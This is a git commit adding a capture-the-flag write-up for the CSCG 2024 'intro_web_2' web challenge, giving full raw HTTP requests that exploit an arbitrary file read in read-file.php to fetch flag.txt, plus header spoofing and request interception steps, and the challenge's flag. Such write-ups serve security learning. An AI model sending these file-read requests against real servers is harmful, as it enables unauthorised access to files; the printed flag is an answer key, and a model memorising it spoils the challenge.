changed repo structure
This commit is contained in:
57
2024/cscg/web/intro_web_2/notes.md
Normal file
57
2024/cscg/web/intro_web_2/notes.md
Normal file
@@ -0,0 +1,57 @@
|
||||
### 1.Part
|
||||
We can spoof our OS with the help of ZAP and get the site [train.html](leaked_sites/train.html)
|
||||
### 2. Part
|
||||
There is an unsecure statistics service which shows you the content of every file you specify. We can use this to get the content of flag.txt.
|
||||
Sending the following request:
|
||||
|
||||
```http
|
||||
POST https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php HTTP/1.1
|
||||
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
content-length: 17
|
||||
Origin: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
||||
Connection: keep-alive
|
||||
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-Fetch-Dest: document
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-User: ?1
|
||||
|
||||
filename=flag.txt
|
||||
```
|
||||
|
||||
Yields the page [statistics_console.html](leaked_sites/statistics_console.html)
|
||||
|
||||
### 3. Part
|
||||
|
||||
A similar bug can be used with a GET request to get the content of the flag.txt file.
|
||||
This time we use a faulty php file called read-file.php
|
||||
|
||||
```http
|
||||
GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php?filename=flag.txt HTTP/1.1
|
||||
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Connection: keep-alive
|
||||
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-Fetch-Dest: document
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-User: ?1
|
||||
content-length: 0
|
||||
```
|
||||
|
||||
Returns the page [statistics_console_get.html](leaked_sites/statistics_console_get.html)
|
||||
|
||||
### 4.Part
|
||||
We now have to intercept a request made and change the authority information.
|
||||
When we do this we get the fourth part of the flag.
|
||||
|
||||
### flag
|
||||
CSCG{l9jj550KUaT0BVvkQ9Z39J9AW4at6R2B}
|
||||
Reference in New Issue
Block a user